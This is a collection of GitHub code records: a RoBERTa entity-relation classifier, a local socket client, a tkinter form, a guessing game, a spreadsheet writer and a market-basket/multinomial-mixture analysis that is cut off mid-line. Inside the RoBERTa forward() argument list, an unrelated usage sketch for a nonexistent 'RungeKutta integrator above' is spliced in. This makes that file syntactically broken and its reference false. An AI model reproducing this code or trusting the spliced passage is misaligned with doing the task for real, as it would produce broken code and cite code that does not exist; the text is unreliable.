+{"seq_id":"71921351204","text":"\nimport logging\nimport warnings\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import CrossEntropyLoss, MSELoss\n\nfrom transformers.configuration_roberta import RobertaConfig\nfrom transformers.modeling_bert import BertPreTrainedModel\nfrom transformers.activations import gelu\n\nfrom transformers import RobertaModel\n\nlogger = logging.getLogger(__name__)\n\n_TOKENIZER_FOR_DOC = \"RobertaTokenizer\"\n\nROBERTA_PRETRAINED_MODEL_ARCHIVE_LIST = [\n \"roberta-base\",\n \"roberta-large\",\n \"roberta-large-mnli\",\n \"distilroberta-base\",\n \"roberta-base-openai-detector\",\n \"roberta-large-openai-detector\",\n # See all RoBERTa models at https://huggingface.co/models?filter=roberta\n]\n\nclass RobertaForJointEntityRelationClassification(BertPreTrainedModel):\n config_class = RobertaConfig\n base_model_prefix = \"roberta\"\n\n def __init__(self, config):\n super().__init__(config)\n self.num_labels = config.num_labels\n\n self.roberta = RobertaModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.token_classifier = nn.Linear(config.hidden_size, config.num_labels)\n self.relation_classifier = RobertaRelationClassificationHead(config.hidden_size, config.hidden_dropout_prob, 2)\n self.init_weights()\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n 
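A usage sketch for the RungeKutta integrator above: step the scheme at 1 ms resolution and print the critical points it reports (peak height and time, speed and time on reaching the sea).

rk = RungeKutta(delta_t=0.001)
y_alt_max, t_alt_max, v_mar, t_mar = rk.pontos_criticos()
print(f"peak {y_alt_max:.2f} m at {t_alt_max:.2f} s; "
      f"sea level at {v_mar:.2f} m/s after {t_mar:.2f} s")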
token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n labels=None,\n relation_labels=None,\n output_attentions=None,\n output_hidden_states=None,\n ):\n r\"\"\"\n labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):\n Labels for computing the token classification loss.\n Indices should be in ``[0, ..., config.num_labels - 1]``.\n relation_labels:\n Labels for computing the relation classification loss.\n Currently, it only accepts classes of 0 or 1.\n Returns:\n :obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.RobertaConfig`) and inputs:\n loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`, returned when ``labels`` is provided) :\n Classification loss.\n scores:\n list of (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.num_labels)`) and relation scores\n Entity classification scores and relation scores(before SoftMax) .\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n outputs = self.roberta(\n input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n )\n\n sequence_output = outputs[0]\n\n sequence_output = self.dropout(sequence_output)\n logits_a = self.token_classifier(sequence_output)\n logits_b = self.relation_classifier(sequence_output)\n\n outputs = ([logits_a, logits_b],) + outputs[2:] # add hidden states and attention if they are here\n\n\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n # Only keep active parts of the loss\n if attention_mask is not None:\n active_loss = attention_mask.view(-1) == 1\n active_logits = logits_a.view(-1, self.num_labels)\n active_labels = torch.where(\n active_loss, labels.view(-1), torch.tensor(loss_fct.ignore_index).type_as(labels)\n )\n loss_a = loss_fct(active_logits, active_labels)\n else:\n loss_a = loss_fct(logits_a.view(-1, self.num_labels), labels.view(-1))\n loss = loss_a\n if relation_labels is not None:\n loss_fct = CrossEntropyLoss()\n loss_b = loss_fct(logits_b.view(-1, 2), relation_labels.view(-1))\n if labels is None:\n loss = loss_b\n else:\n # TODO explain loss here\n loss += loss_b.div(20)\n outputs = (loss,) + outputs\n\n return outputs # (loss), scores, (hidden_states), (attentions)\n\n\n\nclass RobertaRelationClassificationHead(nn.Module):\n \"\"\"Head for sentence-level classification tasks.\"\"\"\n\n def __init__(self, hidden_size, hidden_dropout_prob, num_relations):\n super().__init__()\n self.dense = nn.Linear(hidden_size, hidden_size)\n 
self.dropout = nn.Dropout(hidden_dropout_prob)\n self.out_proj = nn.Linear(hidden_size, num_relations)\n\n def forward(self, features, **kwargs):\n x = features[:, 0, :] # take <s> token (equiv. to [CLS])\n x = self.dropout(x)\n x = self.dense(x)\n x = torch.tanh(x)\n x = self.dropout(x)\n x = self.out_proj(x)\n return x\n","repo_name":"yoonsikp/clerx_lm","sub_path":"model/torch_jer.py","file_name":"torch_jer.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11607136002","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/4/7 19:20\n# @Author : XiaTian\n# @File : 客户端.py\n\nimport socket\n\n\nphone = socket.socket(family=socket.AF_INET,type=socket.SOCK_STREAM)\nphone.connect(('127.0.0.1',8081))\nwhile True:\n c_msg = input('>>:').strip()\n phone.send(str(c_msg).encode('utf-8'))\n data = phone.recv(1024)\n print(data)\nphone.close()\n\n\n","repo_name":"summer5625/Mygit","sub_path":"第三模块_面向对象_网络编程基础/网络编程/day1/通信循环/客户端.py","file_name":"客户端.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32348104107","text":"from tkinter import *\nroot = Tk()\nroot.geometry(\"500x300\")\n\ndef getvals():\n print(\"Accepted\")\n\n# Heading\nLabel(root, text=\"Python Registration Form\", font=\"arial 15 bold\").grid(row = 0, column = 3)\n\n# Field name\nname = Label(root, text= \"Name\")\nphone = Label(root, text= \"Phone\")\ngender = Label(root, text= \"Gender\")\nemergency = Label(root, text= \"Emergency Contact\")\npaymentmethod = Label(root, text= \"Payment Method\")\n\n# Packing fields\nname.grid(row=1, column = 2)\nphone.grid(row=2, column = 2)\ngender.grid(row=3, column = 2)\nemergency.grid(row=4, column = 2)\npaymentmethod.grid(row=5, column = 2)\n\n# Variables for storing data\nnamevalue = StringVar()\nphonevalue = StringVar()\ngendervalue = StringVar()\nemergencyvalue = StringVar()\npaymentmethodvalue = StringVar()\ncheckvalue = IntVar()\n\n# Creating entry field\nnameentry = Entry(root, textvariable = namevalue)\nphoneentry = Entry(root, textvariable = phonevalue)\ngenderentry = Entry(root, textvariable = gendervalue)\nemergencyentry = Entry(root, textvariable = emergencyvalue)\npaymentmethodentry = Entry(root, textvariable = paymentmethodvalue)\n\n# Packing entry fields\nnameentry.grid(row = 1, column = 3)\nphoneentry.grid(row = 2, column = 3)\ngenderentry.grid(row = 3, column = 3)\nemergencyentry.grid(row = 4, column = 3)\npaymentmethodentry.grid(row = 5, column = 3)\n\n# Creating checkbox\ncheckbutton = Checkbutton(text = \"remember me?\", variable = checkvalue)\ncheckbutton.grid(row = 6, column = 3)\n\n# Submit button\nButton(text = \"Submit\", command = getvals).grid(row = 7, column = 3)\n\nroot.mainloop()","repo_name":"adamgovoni/registrationForm","sub_path":"registration_form.py","file_name":"registration_form.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43397981195","text":"print(\"=\" * 80)\r\nimport random\r\nfrom time import sleep\r\npensando = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\nn = random.choice(pensando)\r\nr = 'v'\r\npalpites = 0\r\nwhile r != n:\r\n r = int(input(\"Which number from 0 to 10 is the computer thinking of? 
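Returning to the RoBERTa joint model defined earlier, a hedged usage sketch with randomly initialized heads; fine-tuning is assumed to happen elsewhere, and num_labels=9 is an arbitrary illustrative tag-set size rather than a value from the source.

import torch
from transformers import RobertaConfig, RobertaTokenizer

config = RobertaConfig.from_pretrained("roberta-base", num_labels=9)
model = RobertaForJointEntityRelationClassification(config)
tok = RobertaTokenizer.from_pretrained("roberta-base")
enc = tok("Alice works at Acme.", return_tensors="pt")
out = model(input_ids=enc["input_ids"],
            attention_mask=enc["attention_mask"],
            labels=torch.zeros_like(enc["input_ids"]),  # dummy NER tags
            relation_labels=torch.tensor([1]))          # dummy relation class
loss, (ner_logits, rel_logits) = out[0], out[1]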
\"))\r\n palpites += 1\r\n sleep(2)\r\n if r < n:\r\n print(\"Você errou, tente novmente um número maior.\")\r\n if r > n:\r\n print(\"Você errou, tente novamente um número menor.\")\r\n if r == n:\r\n print(\"Você acertou!\")\r\nprint(\"Você precisou de {} palpites para acertar.\".format(palpites))\r\nprint(\"FIM\")\r\nprint(\"=\" * 80)\r\n","repo_name":"Dryixn/Jogo-adivinhacao","sub_path":"ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3353532919","text":"######### CONSTANTS #########\nFILE_NAMES = ['AAFA_CARB',\n 'FILII_NAMER']\n\nFILE_NAME_TO_POPULATIONS = {'AAFA_CARB': ['AAFA', 'CARB', 'ALL'],\n 'FILII_NAMER': ['FILII', 'NAMER', 'ALL']}\n\n# levels of the alleles\nLEVELS_LIST = [\n 'A',\n 'B',\n 'C',\n 'DQB1',\n 'DRB1'\n]\n\n# dictionary of levels -> relative positions in the real data file\nLEVELS_DICT = {'A': 0,\n 'B': 1,\n 'C': 2,\n 'DQB1': 3,\n 'DRB1': 4}\n\n\n","repo_name":"ExtraFlash/HWE","sub_path":"plots/chi_squared/haplotypes_data/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42371431293","text":"import xlsxwriter\nfrom datetime import datetime\n\n\n\nclass Planilha:\n def __init__(self, nomeplanilha: str, linhas: int):\n \n self.nome_arquivo_xls = nomeplanilha\n self.linhas_planilha = linhas\n self.criaPlanilha()\n \n\n def diaCorrente(self):\n data = datetime.today()\n strData = data.strftime('%d/%m/%Y')\n return strData\n\n\n def criaPlanilha(self):\n ultima_linha = self.linhas_planilha\n self.workbook = xlsxwriter.Workbook(self.nome_arquivo_xls)\n self.worksheet = self.workbook.add_worksheet()\n self.worksheet.set_landscape()\n self.worksheet.add_table(f'A3:J{ultima_linha+3}',{'header_row' : False})\n\n\n def criar_titulo(self, titulo: str):\n self.worksheet.set_row(0, 25)\n mesclar_celula = self.workbook.add_format({\n 'bold': 1,\n 'border': 2,\n 'font_size': 14,\n 'align': 'center',\n 'valign': 'vcenter'})\n self.worksheet.merge_range('A1:J1', titulo, mesclar_celula)\n\n\n def criar_cabecalho(self, colunas):\n letras_coluna = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n format = self.workbook.add_format({'align': 'center', 'valign': 'vcenter', 'bold': 1, 'border': 1})\n self.worksheet.set_row(1, 6)\n self.worksheet.set_column(0, 0, 10)\n self.worksheet.set_column(1, 1, 11)\n self.worksheet.set_column(2, 2, 30)\n self.worksheet.set_column(3, 3, 15)\n self.worksheet.set_column(4, 4, 5)\n self.worksheet.set_column(5, 5, 11)\n self.worksheet.set_column(6, 6, 8)\n self.worksheet.set_column(7, 7, 4)\n self.worksheet.set_column(8, 8, 9)\n for i, nome_coluna in enumerate(colunas):\n celula = letras_coluna[i].upper() + '3'\n self.worksheet.write(celula, nome_coluna, format)\n\n\n def escrever(self, local: str, campo: any, negrito: bool, valor: bool):\n # Formatar texto em negrito\n if negrito:\n self.negrito = self.workbook.add_format({'bold': True})\n self.worksheet.write(local, campo, self.negrito)\n else:\n self.negrito = self.workbook.add_format({'bold': False})\n\n if valor:\n self.currency_format = self.workbook.add_format({'num_format': 'R$ #,##0.00'})\n self.worksheet.write(local, campo, self.currency_format)\n else:\n self.worksheet.write(local, campo, 
self.negrito)\n \n \n def fecha_planilha(self):\n self.workbook.close()\n\nif __name__ == '__main__':\n planilha = Planilha('relatorio_teste.xlsx',linhas=1)\n colunas = ['PixID', 'Data', 'Nome', 'Valor', 'Caixa', 'Situação', 'Liberado', 'Ano', 'NumCert', 'NumProt']\n planilha.criar_titulo('Relatório de Pagamentos pix do dia: ' + planilha.diaCorrente())\n planilha.criar_cabecalho(colunas)\n planilha.escrever('A4', 125, False, False)\n planilha.escrever('B4', '09/08/2023', False, False)\n planilha.escrever('C4', 'Eduardo Rossini', False, False)\n planilha.escrever('D4', 741526.09, False, valor=True)\n planilha.escrever('E4', 'isa', False, False)\n planilha.escrever('F4', 'Pago', False, False)\n planilha.escrever('G4', 'bra', False, False)\n planilha.escrever('H4', 23, False, False)\n planilha.escrever('I4', 10258, False, False)\n planilha.escrever('J4', 502655, False, False)\n \n planilha.fecha_planilha()","repo_name":"cyborgrj/SisPag-Pix","sub_path":"xlsx/xlsx.py","file_name":"xlsx.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18813861203","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 18 15:46:04 2020\r\n\r\n@author: Pedro\r\n\"\"\"\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom mlxtend.frequent_patterns import association_rules, apriori\r\nfrom mlxtend.preprocessing import TransactionEncoder\r\n\r\naisles = pd.read_csv('aisles.csv')\r\ndepartments = pd.read_csv('departments.csv')\r\norder_products_prior = pd.read_csv('order_products__prior.csv')\r\norder_products_train = pd.read_csv('order_products__train.csv')\r\norders = pd.read_csv('orders.csv')\r\nproducts = pd.read_csv('products.csv')\r\nsample_submission = pd.read_csv('sample_submission.csv')\r\n\r\n#1) Data preparation\r\n#Create merge of orders and products\r\norder1 = order_products_train.merge(products, how='inner')\r\norder1 = order1.sort_values(by=['order_id','add_to_cart_order'])\r\norder2 = order1.groupby('order_id')['product_name'].agg(', '.join).reset_index()\r\n\r\n# 1) Apriori algorithm\r\n# get all shopping lists as one list\r\none_product = list(order2['product_name'].apply(lambda x: sorted(x.split(','))))\r\n\r\n# instantiate transcation encoder\r\nencoder = TransactionEncoder().fit(one_product)\r\nonehot = encoder.transform(one_product)\r\n\r\n# convert one-hot encode data to DataFrame\r\nonehot = pd.DataFrame(onehot, columns=encoder.columns_)\r\n\r\n# compute frequent items using the Apriori algorithm - Get up to three items\r\nfrequent_itemsets = apriori(onehot, min_support=.006, max_len=3, use_colnames=True)\r\nfrequent_itemsets.to_csv('frequent_itemsets.csv', index=False)\r\n\r\n# compute all association rules for frequent_itemsets\r\nrules = association_rules(frequent_itemsets, metric=\"lift\", min_threshold=1)\r\n\r\n# given that the left-hand side has two items, then which item is more likely to be added to the basket?\r\nrules['lhs items'] = rules['antecedents'].apply(lambda x:len(x) )\r\nrules[rules['lhs items']>1].sort_values('lift', ascending=False).head()\r\nrules.to_csv('rules.csv', index=False)\r\n\r\n# Data visualization of Market Basket Analysis\r\nimport seaborn as sns\r\n# Replace frozen sets with strings\r\nrules['antecedents_'] = rules['antecedents'].apply(lambda a: ','.join(list(a)))\r\nrules['consequents_'] = rules['consequents'].apply(lambda a: ','.join(list(a)))\r\n# Transform the DataFrame of rules into a matrix using the lift metric\r\npivot = 
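Before the pivot and heatmap step, a tiny self-contained check of the TransactionEncoder one-hot encoding used by the market-basket script above.

import pandas as pd
from mlxtend.preprocessing import TransactionEncoder

baskets = [["milk", "bread"], ["bread", "eggs"], ["milk", "eggs", "bread"]]
enc = TransactionEncoder().fit(baskets)
onehot = pd.DataFrame(enc.transform(baskets), columns=enc.columns_)
# three baskets over three distinct items -> a 3x3 boolean frame
assert onehot.shape == (3, 3) and bool(onehot.loc[0, "milk"])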
rules[rules['lhs items']>=1].pivot(\r\n index='antecedents_', columns='consequents_', values= 'lift')\r\n# Generate a heatmap with annotations on and the colorbar off\r\nfig, ax = plt.subplots(figsize=(8,7)) \r\nm = sns.heatmap(pivot, annot=True, linewidths=.1, annot_kws={\"size\":10}, ax=ax)\r\nplt.ylabel('Antecedents')\r\nplt.xlabel('Consequents')\r\nplt.yticks(rotation=0)\r\nplt.xticks(rotation=90)\r\nplt.show()\r\n\r\nn = m.get_figure()\r\nn.savefig('heatmap.png', bbox_inches='tight')\r\n\r\n#by aisle\r\norder3 = order1.merge(aisles, how='inner')\r\norder3 = order3.groupby('order_id')['aisle'].agg(', '.join).reset_index()\r\n\r\n# get all shopping lists as one list\r\none_product2 = list(order3['aisle'].apply(lambda x: sorted(x.split(','))))\r\n\r\n# instantiate transcation encoder\r\nencoder = TransactionEncoder().fit(one_product2)\r\nonehot = encoder.transform(one_product2)\r\n\r\n# convert one-hot encode data to DataFrame\r\nonehot = pd.DataFrame(onehot, columns=encoder.columns_)\r\n# compute frequent items using the Apriori algorithm - Get up to three items\r\nfrequent_itemsets = apriori(onehot, min_support=.006, max_len=3, use_colnames=True)\r\nfrequent_itemsets.to_csv('frequent_itemsets2.csv', index=False)\r\n\r\n# compute all association rules for frequent_itemsets\r\nrules = association_rules(frequent_itemsets, metric=\"lift\", min_threshold=1)\r\n\r\n# given that the left-hand side has two items, then which item is more likely to be added to the basket?\r\nrules['lhs items'] = rules['antecedents'].apply(lambda x:len(x) )\r\nrules[rules['lhs items']>1].sort_values('lift', ascending=False).head()\r\nrules.to_csv('rules.csv', index=False)\r\n\r\n# Data visualization of Market Basket Analysis\r\nimport seaborn as sns\r\n# Replace frozen sets with strings\r\nrules['antecedents_'] = rules['antecedents'].apply(lambda a: ','.join(list(a)))\r\nrules['consequents_'] = rules['consequents'].apply(lambda a: ','.join(list(a)))\r\n# Transform the DataFrame of rules into a matrix using the lift metric\r\npivot = rules[rules['lhs items']>=1].pivot(\r\n index='antecedents_', columns='consequents_', values= 'lift')\r\n# Generate a heatmap with annotations on and the colorbar off\r\nfig, ax = plt.subplots(figsize=(8,7)) \r\nm = sns.heatmap(pivot, annot=True, linewidths=.1, annot_kws={\"size\":10}, ax=ax)\r\nplt.ylabel('Antecedents')\r\nplt.xlabel('Consequents')\r\nplt.yticks(rotation=0)\r\nplt.xticks(rotation=90)\r\nplt.show()\r\n\r\nn = m.get_figure()\r\nn.savefig('heatmap2.png', bbox_inches='tight')\r\n\r\n# Examining Big Data processing issues\r\nonehot.info(verbose=False, memory_usage=\"deep\") #memory usage: 7.0 GB!\r\n\r\n# 5) Multinomial mixture model\r\n#Based on: https://towardsdatascience.com/multinomial-mixture-model-for-supermarket-shoppers-segmentation-a-complete-tutorial-268974d905da\r\n# Data preparation\r\n# Tree structure of the problem (actually, a forest): \r\n #user_id -> order_id -> product_id\r\n \r\norder3 = order1[['order_id', 'product_id']]\r\norder3 = order3.merge(orders, how='inner')\r\norder3 = order3[['user_id', 'order_id', 'product_id']]\r\n\r\n#However, we do have departments and ailes\r\norder4 = order1.merge(departments, how='inner')\r\norder4.groupby('department')['order_id'].count().plot(kind=\"bar\")\r\norder4 = order4.merge(aisles, how='inner')\r\norder4.groupby('aisle')['order_id'].count().plot(kind=\"bar\")\r\n\r\n# Sparse matrix\r\nimport numpy as np\r\nfrom scipy import sparse\r\n\r\norder5 = order4.apply(lambda 
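Continuing from the rules frame built above, a sketch of shortlisting rules before plotting; the 0.3 confidence and 1.2 lift thresholds are illustrative assumptions, not values from the analysis.

strong = rules[(rules['lhs items'] == 2)
               & (rules['confidence'] >= 0.3)
               & (rules['lift'] > 1.2)].sort_values('lift', ascending=False)
print(strong[['antecedents_', 'consequents_', 'support', 'confidence', 'lift']].head())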
s:s.astype(\"category\"))\r\norder5.aisle.cat.categories\r\narr = sparse.coo_matrix((np.ones(order5.shape[0]), \r\n (order5.aisle.cat.codes, order5.order_id.cat.codes)))\r\n\r\n#split numpy array in train and test datasets following the 80/20 rule\r\narr2 = arr.toarray()\r\narr2 = arr2.astype(int)\r\narr3 = pd.DataFrame.sparse.from_spmatrix(arr)\r\n\r\n#pickling, so the work won't be lost\r\n\r\nimport pickle\r\n\r\nwith open('arr.pickle', 'wb') as f:\r\n pickle.dump(arr, f) \r\nwith open('arr2.pickle', 'wb') as f:\r\n pickle.dump(arr2, f)\r\narr3.to_pickle('arr3.pickle')\r\norder1.to_pickle('order1.pickle')\r\norder2.to_pickle('order2.pickle')\r\norder3.to_pickle('order3.pickle')\r\norder4.to_pickle('order4.pickle')\r\norder5.to_pickle('order5.pickle')\r\n\r\n# How many products do clients usually buy?\r\n\r\ndef plot_customer_freq(x):\r\n basket_counts_by_customer = x.groupby(['order_id'])['product_id'].count()\r\n basket_counts_by_customer.plot.hist(bins=np.arange(100))\r\n\r\nplot_customer_freq(order3)\r\n\r\n# Make a sparse matrix with two indexes: user and order\r\n\r\norder6 = order3.merge(products, how='inner')\r\norder6 = order6[['user_id', 'order_id', 'product_name']]\r\n\r\nbaskets_data = order6.groupby(['user_id', 'order_id'])['product_name'].value_counts()\r\nbaskets_data_df = pd.DataFrame(data=baskets_data.values, index=baskets_data.index,\r\n columns=['Count']).reset_index()\r\ncounts_df = baskets_data_df.pivot(index=['user_id', 'order_id'], columns=['product_name'],\r\n values=['Count'])['Count']\r\ncounts_df.fillna(0, inplace=True)\r\n\r\n\r\n\r\n#Implementation of the algorithm\r\n\r\nfrom tqdm import tqdm\r\nfrom scipy.stats import multinomial, dirichlet\r\n\r\nclass MultinomialExpectationMaximizer:\r\n def __init__(self, K, rtol=1e-4, max_iter=100, restarts=10):\r\n self._K = K\r\n self._rtol = rtol\r\n self._max_iter = max_iter\r\n self._restarts = restarts\r\n\r\n def compute_log_likelihood(self, X_test, alpha, beta):\r\n mn_probs = np.zeros(X_test.shape[0])\r\n for k in range(beta.shape[0]):\r\n mn_probs_k = alpha[k] * self._multinomial_prob(X_test, beta[k])\r\n mn_probs += mn_probs_k\r\n mn_probs[mn_probs == 0] = np.finfo(float).eps\r\n return np.log(mn_probs).sum()\r\n \r\n def compute_aic(self, X_test, alpha, beta, log_likelihood=None):\r\n if log_likelihood is None:\r\n log_likelihood = self.compute_predictive_entropy(X_test, alpha, beta)\r\n return 2 * (alpha.size + beta.size) - 2 * log_likelihood\r\n\r\n def compute_bic(self, X_test, alpha, beta, log_likelihood=None):\r\n if log_likelihood is None:\r\n log_likelihood = self.compute_predictive_entropy(X_test, alpha, beta)\r\n N = X_test.shape[0]\r\n nb_params = (alpha.shape[0] - 1) + (beta.shape[0] * (beta.shape[1] - 1))\r\n return -log_likelihood + (0.5 * np.log(N) * nb_params)\r\n \r\n def compute_icl_bic(self, bic, gamma):\r\n classification_entropy = -(np.log(gamma.max(axis=1))).sum()\r\n return bic + classification_entropy\r\n\r\n def _multinomial_prob(self, counts, beta):\r\n \"\"\"\r\n Evaluates the multinomial probability for a given vector of counts\r\n counts: (C), vector of counts for a specific observation\r\n beta: (C), vector of parameters for every component of the multinomial\r\n\r\n Returns:\r\n p: (1), scalar value for the probability of observing the count vector given the beta parameters\r\n \"\"\"\r\n n = counts.sum(axis=-1)\r\n m = multinomial(n, beta)\r\n return m.pmf(counts)\r\n\r\n def _e_step(self, X, alpha, beta):\r\n \"\"\"\r\n Performs E-step on MNMM model\r\n Each input is numpy 
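A self-contained miniature of the aisle-by-order count matrix built with coo_matrix above, using categorical codes as row and column indices.

import numpy as np
import pandas as pd
from scipy import sparse

df = pd.DataFrame({"aisle": list("abacb"),
                   "order_id": [1, 1, 2, 2, 3]}).astype("category")
mat = sparse.coo_matrix((np.ones(len(df)),
                         (df.aisle.cat.codes, df.order_id.cat.codes)))
# 3 distinct aisles x 3 distinct orders; aisle 'a' appears once in order 1
assert mat.shape == (3, 3) and mat.toarray()[0, 0] == 1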
        Each input is numpy array:\r\n        X: (N x C), data points\r\n        alpha: (K), mixture component weights\r\n        beta: (K x C), multinomial categories weights\r\n\r\n        Returns:\r\n        gamma: (N x K), probabilities of clusters for objects\r\n        \"\"\"\r\n        # Compute gamma\r\n        N = X.shape[0]\r\n        K = alpha.shape[0]\r\n        weighted_multi_prob = np.zeros((N, K))\r\n        for k in range(K):\r\n            weighted_multi_prob[:, k] = alpha[k] * self._multinomial_prob(X, beta[k])\r\n\r\n        denum = weighted_multi_prob.sum(axis=1)\r\n        # guard against rows where every component probability underflows to zero\r\n        denum[denum == 0] = np.finfo(float).eps\r\n        gamma = weighted_multi_prob / denum.reshape(-1, 1)\r\n\r\n        return gamma\r\n\r\n    def _m_step(self, X, gamma):\r\n        \"\"\"\r\n        Performs M-step on MNMM model\r\n        Each input is numpy array:\r\n        X: (N x C), data points\r\n        gamma: (N x K), probabilities of clusters for objects\r\n\r\n        Returns:\r\n        alpha: (K), mixture component weights\r\n        beta: (K x C), mixture categories weights\r\n        \"\"\"\r\n        # Compute alpha\r\n        alpha = gamma.sum(axis=0) / gamma.sum()\r\n\r\n        # Compute beta\r\n        weighted_counts = gamma.T.dot(X)\r\n        beta = weighted_counts / weighted_counts.sum(axis=-1).reshape(-1, 1)\r\n\r\n        return alpha, beta\r\n\r\n    def _compute_vlb(self, X, alpha, beta, gamma):\r\n        \"\"\"\r\n        Each input is numpy array:\r\n        X: (N x C), data points\r\n        alpha: (K), mixture component weights\r\n        beta: (K x C), multinomial categories weights\r\n        gamma: (N x K), probabilities of clusters for objects\r\n\r\n        Returns value of variational lower bound\r\n        \"\"\"\r\n        loss = 0\r\n        for k in range(alpha.shape[0]):\r\n            weights = gamma[:, k]\r\n            loss += np.sum(weights * (np.log(alpha[k]) + np.log(self._multinomial_prob(X, beta[k]))))\r\n            loss -= np.sum(weights * np.log(weights))\r\n        return loss\r\n    \r\n    def _init_params(self, C):\r\n        alpha = np.array([1 / self._K] * self._K)\r\n        beta = dirichlet.rvs([2 * C] * C, self._K)\r\n        return alpha, beta\r\n\r\n    def _train_once(self, X):\r\n        loss = float('inf')\r\n        C = X.shape[1]\r\n        alpha, beta = self._init_params(C)\r\n\r\n        for it in range(self._max_iter):\r\n            prev_loss = loss\r\n            gamma = self._e_step(X, alpha, beta)\r\n            alpha, beta = self._m_step(X, gamma)\r\n            loss = self._compute_vlb(X, alpha, beta, gamma)\r\n            if it > 0 and (np.abs((prev_loss - loss) / prev_loss) < self._rtol):\r\n                break\r\n        return alpha, beta, gamma, loss\r\n\r\n    def fit(self, X):\r\n        '''\r\n        Starts with random initialization *restarts* times\r\n        Runs optimization until saturation with *rtol* reached\r\n        or *max_iter* iterations were made.\r\n\r\n        X: (N, C), data points\r\n        K: int, number of clusters\r\n        '''\r\n        best_loss = -float('inf')\r\n        best_alpha = None\r\n        best_beta = None\r\n        best_gamma = None\r\n\r\n        for it in range(self._restarts):\r\n            alpha, beta, gamma, loss = self._train_once(X)\r\n            if loss > best_loss:\r\n                best_loss = loss\r\n                best_alpha = alpha\r\n                best_beta = beta\r\n                best_gamma = gamma\r\n\r\n        return best_loss, best_alpha, best_beta, best_gamma\r\n    \r\n
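# --- Added usage sketch (not part of the original script): how the mixture
# class above can be applied directly. `counts` is a stand-in for an (N, C)
# count matrix such as counts_df.values from the pivot step earlier.
#     em = MultinomialExpectationMaximizer(K=5, restarts=3)
#     best_loss, alpha, beta, gamma = em.fit(counts)
#     segments = gamma.argmax(axis=1)   # hard cluster assignment per basket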
def run_em(X, K_max=20, criterion='icl_bic'):\r\n    \r\n    if criterion not in {'icl_bic', 'bic'}:\r\n        raise Exception('Unknown value for criterion: %s' % criterion)\r\n\r\n    X = np.vstack(X)\r\n    np.random.shuffle(X)\r\n\r\n    nb_train = int(X.shape[0] * 0.8)\r\n    X_train = X[:nb_train]\r\n    X_test = X[nb_train:]\r\n\r\n    likelihoods = []\r\n    bics = []\r\n    icl_bics = []\r\n    best_k = -1\r\n    best_alpha = None\r\n    best_beta = None\r\n    best_gamma = None\r\n    prev_criterion = float('inf')\r\n    \r\n    for k in tqdm(range(2, K_max + 1)):\r\n        model = MultinomialExpectationMaximizer(k, restarts=1)\r\n        _, alpha, beta, gamma = model.fit(X_train)\r\n        log_likelihood = model.compute_log_likelihood(X_test, alpha, beta)\r\n        bic = model.compute_bic(X_test, alpha, beta, log_likelihood)\r\n        icl_bic = model.compute_icl_bic(bic, gamma)\r\n        likelihoods.append(log_likelihood)\r\n        bics.append(bic)\r\n        icl_bics.append(icl_bic)\r\n\r\n        criterion_cur_value = icl_bic if criterion == 'icl_bic' else bic\r\n        if criterion_cur_value < prev_criterion:\r\n            prev_criterion = criterion_cur_value\r\n            best_alpha = alpha\r\n            best_beta = beta\r\n            best_gamma = gamma\r\n            best_k = k\r\n    \r\n    print('best K = %i' % best_k)\r\n    print('best_alpha: %s' % str(best_alpha))\r\n    print('best_beta: %s' % str(best_beta))\r\n    \r\n    return likelihoods, bics, icl_bics, best_alpha, best_beta, best_gamma\r\n\r\nimport matplotlib.tri as tri\r\nimport matplotlib.lines as lines\r\nfrom collections import defaultdict\r\n\r\ncorners = np.array([[0, 0], [1, 0], [0.5, 0.75**0.5]])\r\nAREA = 0.5 * 1 * 0.75**0.5\r\ntriangle = tri.Triangulation(corners[:, 0], corners[:, 